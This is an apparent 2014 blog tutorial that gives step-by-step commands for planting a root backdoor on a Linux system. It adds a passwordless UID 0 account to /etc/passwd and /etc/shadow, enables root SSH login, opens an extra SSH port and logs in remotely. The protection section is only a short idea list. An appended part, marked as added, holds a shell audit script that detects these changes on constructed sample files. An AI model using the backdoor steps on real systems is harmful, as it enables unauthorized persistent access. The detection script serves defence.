Saturday, 13 December 2014

Hack: Simplest of Backdoors.



Computer System A (Alice).


A backdoor is software that allows access to a computer system, for example a call to a certain function.

Backdoors are left by programmers & hackers to *easily & quickly* gain access to a hacked or normally accessed machine at a later time.

It's a useful skill for any net admin to be able to leave a backdoor on a computer system - in order to protect hardware-software infrastructure against data leaks or machine-control attempts of this type - especially when combined with programming or scripting.

In this tutorial we'll explain how to leave a backdoor on a Linux system & how to protect against this type of attack.


---
How to leave a backdoor on a Linux system?

1. Modify the /etc/passwd & /etc/shadow files properly, to add a user with an intelligently chosen name.

to the /etc/passwd file we add the line:

username::0:0::path:shell

where:
- username is the name of the user added
- path is the user's home path - for example /root for the root user
- shell is the shell used - for example /bin/bash
- the first 0 is the user identifier (use 0 for the root user)
- the second 0 is the group identifier (use 0 for the root group)

for example:
bond::0:0::/root:/bin/bash

to /etc/shadow we add the line:
username::::::::

where:
- username is the name of the user added

for example:
bond::::::::

then we call the passwd username command to finalize the process.

for example:
passwd bond


2. Configure & start the sshd service, which allows remote access to the computer using a secure (encrypted) connection.

we edit the file: /etc/ssh/sshd_config
we modify the line with the PermitRootLogin directive if necessary, to allow root login.
for example, we can comment it out with the # character.

# PermitRootLogin no

we start the sshd service.

depending on the Linux distribution, this command can vary, for example:
/etc/init.d/sshd start
service ssh start

we might need to locate the sshd file with the 'locate sshd' command.


3. Connect remotely to the computer system with the backdoor.

ssh username@ipaddr
ssh username@ipaddr -p port

where:
- username is the name of the user added in the backdoor creation process
- ipaddr is the IP address of the computer system with the backdoor
- port is the port number of the computer system with the backdoor (22 by default)

for example:
ssh bond@192.168.1.100
ssh bond@192.168.1.100 -p 2016

additional ssh port(s) are enabled in the /etc/ssh/sshd_config file by adding line(s):
Port portnumber

where:
- portnumber is the number of the port to listen on.


for example:

(screenshot: /etc/ssh/sshd_config, the ssh configuration file; the ssh listen ports are configured there.)


then we need to start or restart the ssh service.

for example:
/etc/init.d/sshd start
service ssh start
/etc/init.d/sshd restart
service ssh restart

4. Checking if the ssh service is running, and on which ports it listens:

the 'sockstat | grep' command.


the sockstat tool, if not available, can be obtained from the software repository with:

apt-get install sockstat

(this changes the operating system configuration, leaving a trace of tampering - as most commands do, but this one is a serious trace of tampering).

or we can use the commands:
- service ssh status
- service sshd status

if none of the above works, keep hacking; perhaps there are other commands that work...


----
How to protect a computer system against this type of backdoor?

for now I have the following ideas:

- manual checking of the files regularly (/etc/passwd, /etc/shadow),
- using a grep script to automate the above-mentioned check,
- using 'hidden' kernel functionality - which is beyond the scope of this tutorial...).

(to be elaborated if necessary, but I need a little time to think, to do it properly enough).
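The checks sketched in the list above (a regular look at /etc/passwd and /etc/shadow, automated with grep-style matching) together with the port listing from step 4, written out as an added example that is not part of the original post. It is a POSIX sh script built on awk: it reports every UID 0 account other than root, every account whose shadow password field is empty, passwd entries with no shadow entry, the effective PermitRootLogin value and any extra Port directives. The function names and the sample files it builds are my own assumptions; the sample contents are constructed for the dry run and are not taken from any real system.

```shell
#!/bin/sh
# Added example, not from the original post: audit checks for the backdoor
# pattern described above. Every function takes file paths as arguments so it
# can run against the live files (as root) or against copies; make_samples
# builds constructed sample files for a dry run without root access.

# Print every account with UID 0 whose name is not "root".
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Print every account whose password field is empty: neither a hash nor a
# "*" / "!" lock marker, so the account can log in without any password.
empty_password_accounts() {
    awk -F: '$2 == "" { print $1 }' "$1"
}

# Print accounts present in passwd but missing from shadow, an inconsistency
# that hand-edited files often leave behind. Arguments: passwd shadow.
passwd_without_shadow() {
    awk -F: 'NR == FNR { seen[$1] = 1; next } !($1 in seen) { print $1 }' "$2" "$1"
}

# Print the effective PermitRootLogin value from an sshd_config. sshd uses the
# first occurrence of a keyword, so the first uncommented line wins; prints
# nothing when the directive is absent or commented out (sshd default applies).
permit_root_login_setting() {
    awk 'tolower($1) == "permitrootlogin" { print $2; exit }' "$1"
}

# Print every Port directive in an sshd_config, or 22 when none is set.
sshd_listen_ports() {
    awk 'tolower($1) == "port" { print $2; n++ } END { if (!n) print 22 }' "$1"
}

# Run all checks. Arguments: passwd shadow sshd_config.
# Prints one line per finding; returns 1 if anything was found, else 0.
audit_dir() {
    findings=0
    for u in $(extra_uid0_accounts "$1"); do
        echo "FINDING: extra UID 0 account: $u"; findings=1
    done
    for u in $(empty_password_accounts "$2"); do
        echo "FINDING: empty password field in shadow: $u"; findings=1
    done
    for u in $(passwd_without_shadow "$1" "$2"); do
        echo "FINDING: passwd entry without shadow entry: $u"; findings=1
    done
    setting=$(permit_root_login_setting "$3")
    if [ -z "$setting" ]; then
        echo "NOTE: PermitRootLogin not set; the sshd default applies"
    elif [ "$setting" != "no" ]; then
        echo "FINDING: PermitRootLogin is '$setting'"; findings=1
    fi
    for p in $(sshd_listen_ports "$3"); do
        [ "$p" = "22" ] || echo "NOTE: sshd listens on extra port $p"
    done
    return $findings
}

# Constructed sample files (not real system data) in a temp dir; prints its
# path. The "bond" lines are exactly the ones the post above adds.
make_samples() {
    dir=$(mktemp -d)
    cat > "$dir/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bond::0:0::/root:/bin/bash
EOF
    cat > "$dir/shadow" <<'EOF'
root:$6$constructed$notarealhash:16400:0:99999:7:::
daemon:*:16400:0:99999:7:::
alice:$6$constructed$notarealhash:16400:0:99999:7:::
bond::::::::
EOF
    cat > "$dir/sshd_config" <<'EOF'
# PermitRootLogin no
Port 22
Port 2016
EOF
    echo "$dir"
}

# Dry run on the samples: sh audit.sh --demo (exits 1 because "bond" is found).
# Live use, as root: audit_dir /etc/passwd /etc/shadow /etc/ssh/sshd_config
if [ "${1:-}" = "--demo" ]; then
    d=$(make_samples)
    audit_dir "$d/passwd" "$d/shadow" "$d/sshd_config"
    rm -rf "$d"
fi
```

The UID 0 check is the one that matters most: once `passwd bond` has been run, the shadow field is no longer empty, but the duplicate UID 0 stays visible in /etc/passwd. Running the script from cron and comparing its output against a known-good baseline turns the "manual checking" idea above into a scheduled check.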

that's all.




Computer System B (Bob).
